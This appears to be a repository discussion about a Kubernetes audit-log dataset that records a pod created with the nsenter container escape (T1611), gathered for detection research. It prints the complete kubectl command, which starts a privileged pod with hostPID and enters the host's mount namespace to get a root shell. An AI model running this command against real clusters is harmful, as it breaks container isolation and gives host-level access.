T1611 - k8s audit logs - nsenter container escape

[yogisec]

This is a dataset that shows the complete lifecycle of a pod which is created using a known container escape. It tracks the initial request to create, the internal components of k8s provisioning it, and the eventual deletion of the pod.

These logs are the result of running the following command:

kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'

This exact command is referenced in the atomic red team test, the securekubernetes reference and the tweet linked as references for this data.

[patel-bhavin]

Is there an associated detection where we can use this attack_data?

[yogisec]

I had one, but as time has gone on I think I nuked all of the work streams I had associated between, security_content, attack_range, and this repo. Feel free to close this out. I wont be able to contribute here anymore.